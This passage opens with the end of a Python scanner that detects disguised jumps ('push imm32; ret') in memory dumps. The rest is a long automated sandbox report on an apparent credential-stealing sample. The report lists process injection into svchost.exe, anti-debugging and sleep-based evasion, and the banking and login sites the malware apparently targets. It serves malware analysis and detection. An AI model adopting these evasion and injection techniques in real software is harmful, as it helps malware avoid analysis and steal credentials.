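            desc = name
            if name == "push imm32; ret":
                target = int.from_bytes(m.group("imm"), "little")
                desc = f"push {target:08X}h; ret  (jmp {target:08X}h in disguise)"
            elif name == "push reg; ret":
                desc = f"push {REGS[m.group('reg')[0] - 0x50]}; ret  (jmp via register)"
            hits.append((base + m.start(), desc, target))
    return sorted(hits)


# Constructed sample: the report's "push 49A0F8CEh; ret" encoding, a normal
# function prologue as filler, an rdtsc timing check, push eax; ret and pushad; ret.
SAMPLE_CODE = (
    b"\x90\x90"                     # nop ; nop
    + b"\x68\xce\xf8\xa0\x49\xc3"   # push 49A0F8CEh ; ret
    + b"\x8b\xff\x55\x8b\xec"       # mov edi,edi ; push ebp ; mov ebp,esp
    + b"\x0f\x31"                   # rdtsc
    + b"\x33\xc0"                   # xor eax,eax
    + b"\x50\xc3"                   # push eax ; ret
    + b"\x60\xc3"                   # pushad ; ret
)

if __name__ == "__main__":
    for addr, desc, _ in scan(SAMPLE_CODE, base=0x00416000):
        print(f"{addr:08X}  {desc}")
```

Note that the prologue's push ebp (0x55) is not reported because it is not followed by ret; the scanner only fires on the complete two-byte transfer. On a memory dump of the hollowed svchost.exe, passing the region's base address reproduces the report's 2_2_00416xxx addressing so hits can be compared line by line.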
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\Shipping documents..exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Windows\SysWOW64\ktmutil.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (reported 5 times)

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Shipping documents..exe | API/Special instruction interceptor: Address: 3EB5E9C
                Source: C:\Windows\SysWOW64\ktmutil.exe | API/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\ktmutil.exe | API/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\ktmutil.exe | API/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\ktmutil.exe | API/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\ktmutil.exe | API/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\ktmutil.exe | API/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\ktmutil.exe | API/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\ktmutil.exe | API/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377096E rdtsc
                Source: C:\Windows\SysWOW64\ktmutil.exe | Window / User API: threadDelayed 1951
                Source: C:\Windows\SysWOW64\ktmutil.exe | Window / User API: threadDelayed 8023
                Source: C:\Users\user\Desktop\Shipping documents..exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-87180
                Source: C:\Users\user\Desktop\Shipping documents..exe | API coverage: 3.6 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ktmutil.exe | API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 6036 | Thread sleep count: 1951 > 30
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 6036 | Thread sleep time: -3902000s >= -30000s
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 6036 | Thread sleep count: 8023 > 30
                Source: C:\Windows\SysWOW64\ktmutil.exe TID: 6036 | Thread sleep time: -16046000s >= -30000s
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe TID: 2752 | Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe TID: 2752 | Thread sleep count: 39 > 30
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe TID: 2752Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe TID: 2752Thread sleep time: -58500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe TID: 2752Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe TID: 2752Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0299C810 FindFirstFileW,FindNextFileW,FindClose,6_2_0299C810
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                Source: 283026M3L.6.dr; Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: VMware20,11696487552^
                Source: 283026M3L.6.dr; Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 283026M3L.6.dr; Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 283026M3L.6.dr; Binary or memory string: discord.comVMware20,11696487552f
                Source: 283026M3L.6.dr; Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: omVMware20,11696487552|UE
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: turbotax.intuit.comVMware20,11696487552
                Source: 283026M3L.6.dr; Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: nteractive Brokers - HKVMware20,11696487552]
                Source: 283026M3L.6.dr; Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 283026M3L.6.dr; Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 283026M3L.6.dr; Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 283026M3L.6.dr; Binary or memory string: global block list test formVMware20,11696487552
                Source: 283026M3L.6.dr; Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: .co.inVMware20,11696487552d
                Source: 283026M3L.6.dr; Binary or memory string: AMC password management pageVMware20,11696487552
                Source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2742161906.0000026C9564C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ansaction PasswordVMware20,11696487552x
                Source: 283026M3L.6.dr; Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 283026M3L.6.dr; Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: 283026M3L.6.dr; Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 283026M3L.6.dr; Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 283026M3L.6.dr; Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: rs.comVMware20,11696487552
                Source: 283026M3L.6.dr; Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 283026M3L.6.dr; Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: global block list test formVMware20,1169648755
                Source: 283026M3L.6.dr; Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 283026M3L.6.dr; Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 283026M3L.6.dr; Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 283026M3L.6.dr; Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 283026M3L.6.dr; Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 283026M3L.6.dr; Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 283026M3L.6.dr; Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: 283026M3L.6.dr; Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 283026M3L.6.dr; Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 283026M3L.6.dr; Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: outlook.office365.comVMware20,1169648
                Source: FuFneNIzDsF.exe, 00000008.00000002.4566944352.000000000124F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
                Source: 283026M3L.6.dr; Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: ktmutil.exe, 00000006.00000002.4571677515.0000000007B97000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CDYNVMware20,11696487552z
                Source: 283026M3L.6.dr; Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\Shipping documents..exe; API call chain: ExitProcess graph end node (graph_0-86308)
                Source: C:\Windows\SysWOW64\svchost.exe; Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe; Process queried: DebugPort
                Source: C:\Windows\SysWOW64\ktmutil.exe; Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0377096E rdtsc
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_00417A83 LdrLoadDll
                Source: C:\Users\user\Desktop\Shipping documents..exe; Code function: 0_2_0045A370 BlockInput
                Source: C:\Users\user\Desktop\Shipping documents..exe; Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\Shipping documents..exe; Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\Shipping documents..exe; Code function: 0_2_03EB6168 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping documents..exe; Code function: 0_2_03EB6108 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Shipping documents..exe; Code function: 0_2_03EB4AB8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0380634F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0380625D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]
